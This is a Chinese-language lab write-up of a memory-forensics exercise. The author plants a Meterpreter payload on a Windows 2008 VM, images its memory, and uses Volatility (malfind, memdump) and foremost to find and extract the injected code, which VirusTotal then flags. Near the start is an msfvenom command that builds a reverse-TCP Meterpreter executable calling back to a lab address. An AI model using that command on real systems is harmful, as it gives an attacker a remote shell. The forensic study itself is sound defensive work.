记录下Volatility使用过程

环境

  • Parrot *1
  • Windows 2008*1

先生成个msf马子

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe

拷到Windows2008机器上运行后迁移进程

image-20201026142436055

image-20201026142448911

然后使用dumpit对内存做完整镜像

image-20201026142524994

做好后的镜像大小取决于机器内存的大小,机器内存越大,镜像后的文件越大

image-20201026142619139

拷回parrot,开始分析

分析

命令如下

volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程,这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw imageinfo来确定使用配置文件的

┌─[[email protected]]─[/home/parrot/Desktop]
└──╼ #volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind
Volatility Foundation Volatility Framework 2.6
Process: wvs_supervisor Pid: 1088 Address: 0x2e0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x002e0000 00 00 00 00 59 e9 ce cd 13 00 e8 f5 ff ff ff 00 ....Y...........
0x002e0010 00 00 00 00 00 00 00 e8 e8 ff ff ff 0a 00 2e 00 ................
0x002e0020 00 00 00 00 e8 db ff ff ff 17 00 2e 00 00 00 00 ................
0x002e0030 00 e8 ce ff ff ff 24 00 2e 00 00 00 00 00 e8 c1 ......$.........

0x002e0000 0000 ADD [EAX], AL
0x002e0002 0000 ADD [EAX], AL
0x002e0004 59 POP ECX
0x002e0005 e9cecd1300 JMP 0x41cdd8
0x002e000a e8f5ffffff CALL 0x2e0004
0x002e000f 0000 ADD [EAX], AL
0x002e0011 0000 ADD [EAX], AL
0x002e0013 0000 ADD [EAX], AL
0x002e0015 0000 ADD [EAX], AL
0x002e0017 e8e8ffffff CALL 0x2e0004
0x002e001c 0a00 OR AL, [EAX]
0x002e001e 2e0000 ADD [CS:EAX], AL
0x002e0021 0000 ADD [EAX], AL
0x002e0023 00e8 ADD AL, CH
0x002e0025 db DB 0xdb
0x002e0026 ff DB 0xff
0x002e0027 ff DB 0xff
0x002e0028 ff17 CALL DWORD [EDI]
0x002e002a 002e ADD [ESI], CH
0x002e002c 0000 ADD [EAX], AL
0x002e002e 0000 ADD [EAX], AL
0x002e0030 00e8 ADD AL, CH
0x002e0032 ce INTO
0x002e0033 ff DB 0xff
0x002e0034 ff DB 0xff
0x002e0035 ff2400 JMP DWORD [EAX+EAX]
0x002e0038 2e0000 ADD [CS:EAX], AL
0x002e003b 0000 ADD [EAX], AL
0x002e003d 00e8 ADD AL, CH
0x002e003f c1 DB 0xc1

Process: opsrv.exe Pid: 1140 Address: 0x670000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x00670000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00670010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00670020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00670030 00 00 00 00 00 00 00 00 00 00 67 00 00 00 00 00 ..........g.....

0x00670000 0000 ADD [EAX], AL
0x00670002 0000 ADD [EAX], AL
0x00670004 0000 ADD [EAX], AL
0x00670006 0000 ADD [EAX], AL
0x00670008 0000 ADD [EAX], AL
0x0067000a 0000 ADD [EAX], AL
0x0067000c 0000 ADD [EAX], AL
0x0067000e 0000 ADD [EAX], AL
0x00670010 0000 ADD [EAX], AL
0x00670012 0000 ADD [EAX], AL
0x00670014 0000 ADD [EAX], AL
0x00670016 0000 ADD [EAX], AL
0x00670018 0000 ADD [EAX], AL
0x0067001a 0000 ADD [EAX], AL
0x0067001c 0000 ADD [EAX], AL
0x0067001e 0000 ADD [EAX], AL
0x00670020 0000 ADD [EAX], AL
0x00670022 0000 ADD [EAX], AL
0x00670024 0000 ADD [EAX], AL
0x00670026 0000 ADD [EAX], AL
0x00670028 0000 ADD [EAX], AL
0x0067002a 0000 ADD [EAX], AL
0x0067002c 0000 ADD [EAX], AL
0x0067002e 0000 ADD [EAX], AL
0x00670030 0000 ADD [EAX], AL
0x00670032 0000 ADD [EAX], AL
0x00670034 0000 ADD [EAX], AL
0x00670036 0000 ADD [EAX], AL
0x00670038 0000 ADD [EAX], AL
0x0067003a 670000 ADD [BX+SI], AL
0x0067003d 0000 ADD [EAX], AL
0x0067003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x25d0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 50, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x025d0000 fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8 .H..H......H....
0x025d0010 cc 00 00 00 41 51 41 50 52 48 31 d2 65 48 8b 52 ....AQAPRH1.eH.R
0x025d0020 60 48 8b 52 18 48 8b 52 20 51 56 48 0f b7 4a 4a `H.R.H.R.QVH..JJ
0x025d0030 48 8b 72 50 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c H.rPM1.H1..<a|.,

0x025d0000 fc CLD
0x025d0001 48 DEC EAX
0x025d0002 89ce MOV ESI, ECX
0x025d0004 48 DEC EAX
0x025d0005 81ec00200000 SUB ESP, 0x2000
0x025d000b 48 DEC EAX
0x025d000c 83e4f0 AND ESP, -0x10
0x025d000f e8cc000000 CALL 0x25d00e0
0x025d0014 41 INC ECX
0x025d0015 51 PUSH ECX
0x025d0016 41 INC ECX
0x025d0017 50 PUSH EAX
0x025d0018 52 PUSH EDX
0x025d0019 48 DEC EAX
0x025d001a 31d2 XOR EDX, EDX
0x025d001c 6548 DEC EAX
0x025d001e 8b5260 MOV EDX, [EDX+0x60]
0x025d0021 48 DEC EAX
0x025d0022 8b5218 MOV EDX, [EDX+0x18]
0x025d0025 48 DEC EAX
0x025d0026 8b5220 MOV EDX, [EDX+0x20]
0x025d0029 51 PUSH ECX
0x025d002a 56 PUSH ESI
0x025d002b 48 DEC EAX
0x025d002c 0fb74a4a MOVZX ECX, WORD [EDX+0x4a]
0x025d0030 48 DEC EAX
0x025d0031 8b7250 MOV ESI, [EDX+0x50]
0x025d0034 4d DEC EBP
0x025d0035 31c9 XOR ECX, ECX
0x025d0037 48 DEC EAX
0x025d0038 31c0 XOR EAX, EAX
0x025d003a ac LODSB
0x025d003b 3c61 CMP AL, 0x61
0x025d003d 7c02 JL 0x25d0041
0x025d003f 2c DB 0x2c

Process: explorer.exe Pid: 2616 Address: 0x2610000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 38, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02610000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x02610010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 [email protected]
0x02610020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x02610030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................

0x02610000 4d DEC EBP
0x02610001 5a POP EDX
0x02610002 90 NOP
0x02610003 0003 ADD [EBX], AL
0x02610005 0000 ADD [EAX], AL
0x02610007 000400 ADD [EAX+EAX], AL
0x0261000a 0000 ADD [EAX], AL
0x0261000c ff DB 0xff
0x0261000d ff00 INC DWORD [EAX]
0x0261000f 00b800000000 ADD [EAX+0x0], BH
0x02610015 0000 ADD [EAX], AL
0x02610017 004000 ADD [EAX+0x0], AL
0x0261001a 0000 ADD [EAX], AL
0x0261001c 0000 ADD [EAX], AL
0x0261001e 0000 ADD [EAX], AL
0x02610020 0000 ADD [EAX], AL
0x02610022 0000 ADD [EAX], AL
0x02610024 0000 ADD [EAX], AL
0x02610026 0000 ADD [EAX], AL
0x02610028 0000 ADD [EAX], AL
0x0261002a 0000 ADD [EAX], AL
0x0261002c 0000 ADD [EAX], AL
0x0261002e 0000 ADD [EAX], AL
0x02610030 0000 ADD [EAX], AL
0x02610032 0000 ADD [EAX], AL
0x02610034 0000 ADD [EAX], AL
0x02610036 0000 ADD [EAX], AL
0x02610038 0000 ADD [EAX], AL
0x0261003a 0000 ADD [EAX], AL
0x0261003c f00000 LOCK ADD [EAX], AL
0x0261003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x2920000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 57, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02920000 4d 5a 41 52 55 48 89 e5 48 83 ec 20 48 83 e4 f0 MZARUH..H...H...
0x02920010 e8 00 00 00 00 5b 48 81 c3 23 5b 00 00 ff d3 48 .....[H..#[....H
0x02920020 81 c3 c8 ae 02 00 48 89 3b 49 89 d8 6a 04 5a ff ......H.;I..j.Z.
0x02920030 d0 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................

0x02920000 4d DEC EBP
0x02920001 5a POP EDX
0x02920002 41 INC ECX
0x02920003 52 PUSH EDX
0x02920004 55 PUSH EBP
0x02920005 48 DEC EAX
0x02920006 89e5 MOV EBP, ESP
0x02920008 48 DEC EAX
0x02920009 83ec20 SUB ESP, 0x20
0x0292000c 48 DEC EAX
0x0292000d 83e4f0 AND ESP, -0x10
0x02920010 e800000000 CALL 0x2920015
0x02920015 5b POP EBX
0x02920016 48 DEC EAX
0x02920017 81c3235b0000 ADD EBX, 0x5b23
0x0292001d ffd3 CALL EBX
0x0292001f 48 DEC EAX
0x02920020 81c3c8ae0200 ADD EBX, 0x2aec8
0x02920026 48 DEC EAX
0x02920027 893b MOV [EBX], EDI
0x02920029 49 DEC ECX
0x0292002a 89d8 MOV EAX, EBX
0x0292002c 6a04 PUSH 0x4
0x0292002e 5a POP EDX
0x0292002f ffd0 CALL EAX
0x02920031 0000 ADD [EAX], AL
0x02920033 0000 ADD [EAX], AL
0x02920035 0000 ADD [EAX], AL
0x02920037 0000 ADD [EAX], AL
0x02920039 0000 ADD [EAX], AL
0x0292003b 00f0 ADD AL, DH
0x0292003d 0000 ADD [EAX], AL
0x0292003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x3e10000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x03e10000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x03e10010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x03e10020 00 00 e1 03 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x03e10030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0x03e10000 0000 ADD [EAX], AL
0x03e10002 0000 ADD [EAX], AL
0x03e10004 0000 ADD [EAX], AL
0x03e10006 0000 ADD [EAX], AL
0x03e10008 0000 ADD [EAX], AL
0x03e1000a 0000 ADD [EAX], AL
0x03e1000c 0000 ADD [EAX], AL
0x03e1000e 0000 ADD [EAX], AL
0x03e10010 0000 ADD [EAX], AL
0x03e10012 0000 ADD [EAX], AL
0x03e10014 0000 ADD [EAX], AL
0x03e10016 0000 ADD [EAX], AL
0x03e10018 0000 ADD [EAX], AL
0x03e1001a 0000 ADD [EAX], AL
0x03e1001c 0000 ADD [EAX], AL
0x03e1001e 0000 ADD [EAX], AL
0x03e10020 0000 ADD [EAX], AL
0x03e10022 e103 LOOPZ 0x3e10027
0x03e10024 0000 ADD [EAX], AL
0x03e10026 0000 ADD [EAX], AL
0x03e10028 0000 ADD [EAX], AL
0x03e1002a 0000 ADD [EAX], AL
0x03e1002c 0000 ADD [EAX], AL
0x03e1002e 0000 ADD [EAX], AL
0x03e10030 0000 ADD [EAX], AL
0x03e10032 0000 ADD [EAX], AL
0x03e10034 0000 ADD [EAX], AL
0x03e10036 0000 ADD [EAX], AL
0x03e10038 0000 ADD [EAX], AL
0x03e1003a 0000 ADD [EAX], AL
0x03e1003c 0000 ADD [EAX], AL
0x03e1003e 0000 ADD [EAX], AL

Process: explorer.exe Pid: 2616 Address: 0x3e90000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 16, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x03e90000 41 ba 80 00 00 00 48 b8 38 a1 d6 fd fe 07 00 00 A.....H.8.......
0x03e90010 48 ff 20 90 41 ba 81 00 00 00 48 b8 38 a1 d6 fd H...A.....H.8...
0x03e90020 fe 07 00 00 48 ff 20 90 41 ba 82 00 00 00 48 b8 ....H...A.....H.
0x03e90030 38 a1 d6 fd fe 07 00 00 48 ff 20 90 41 ba 83 00 8.......H...A...

0x03e90000 41 INC ECX
0x03e90001 ba80000000 MOV EDX, 0x80
0x03e90006 48 DEC EAX
0x03e90007 b838a1d6fd MOV EAX, 0xfdd6a138
0x03e9000c fe07 INC BYTE [EDI]
0x03e9000e 0000 ADD [EAX], AL
0x03e90010 48 DEC EAX
0x03e90011 ff20 JMP DWORD [EAX]
0x03e90013 90 NOP
0x03e90014 41 INC ECX
0x03e90015 ba81000000 MOV EDX, 0x81
0x03e9001a 48 DEC EAX
0x03e9001b b838a1d6fd MOV EAX, 0xfdd6a138
0x03e90020 fe07 INC BYTE [EDI]
0x03e90022 0000 ADD [EAX], AL
0x03e90024 48 DEC EAX
0x03e90025 ff20 JMP DWORD [EAX]
0x03e90027 90 NOP
0x03e90028 41 INC ECX
0x03e90029 ba82000000 MOV EDX, 0x82
0x03e9002e 48 DEC EAX
0x03e9002f b838a1d6fd MOV EAX, 0xfdd6a138
0x03e90034 fe07 INC BYTE [EDI]
0x03e90036 0000 ADD [EAX], AL
0x03e90038 48 DEC EAX
0x03e90039 ff20 JMP DWORD [EAX]
0x03e9003b 90 NOP
0x03e9003c 41 INC ECX
0x03e9003d ba DB 0xba
0x03e9003e 83 DB 0x83
0x03e9003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x4360000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 106, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x04360000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x04360010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 [email protected]
0x04360020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x04360030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................

0x04360000 4d DEC EBP
0x04360001 5a POP EDX
0x04360002 90 NOP
0x04360003 0003 ADD [EBX], AL
0x04360005 0000 ADD [EAX], AL
0x04360007 000400 ADD [EAX+EAX], AL
0x0436000a 0000 ADD [EAX], AL
0x0436000c ff DB 0xff
0x0436000d ff00 INC DWORD [EAX]
0x0436000f 00b800000000 ADD [EAX+0x0], BH
0x04360015 0000 ADD [EAX], AL
0x04360017 004000 ADD [EAX+0x0], AL
0x0436001a 0000 ADD [EAX], AL
0x0436001c 0000 ADD [EAX], AL
0x0436001e 0000 ADD [EAX], AL
0x04360020 0000 ADD [EAX], AL
0x04360022 0000 ADD [EAX], AL
0x04360024 0000 ADD [EAX], AL
0x04360026 0000 ADD [EAX], AL
0x04360028 0000 ADD [EAX], AL
0x0436002a 0000 ADD [EAX], AL
0x0436002c 0000 ADD [EAX], AL
0x0436002e 0000 ADD [EAX], AL
0x04360030 0000 ADD [EAX], AL
0x04360032 0000 ADD [EAX], AL
0x04360034 0000 ADD [EAX], AL
0x04360036 0000 ADD [EAX], AL
0x04360038 0000 ADD [EAX], AL
0x0436003a 0000 ADD [EAX], AL
0x0436003c 0001 ADD [ECX], AL
0x0436003e 0000 ADD [EAX], AL

可以看到2616进程检出了MZ头,dump下

┌─[[email protected]]─[/home/parrot/Desktop]
└──╼ #volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 memdump -p 2616 -D /home/parrot/Desktop/dump/
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing explorer.exe [ 2616] to 2616.dmp

这时候把dmp文件传到VT通常是杀不出来的,毕竟文件体积在那

image-20201026143108818

foremost提取下再看看

┌─[[email protected]]─[~/Desktop/dump]
└──╼ $foremost -i 2616.dmp
Processing: 2616.dmp
|*****|

image-20201026143155763

已经按照文件类型自动分了类,直接看DLL文件夹

image-20201026143348020

传VT

meterpreter已检出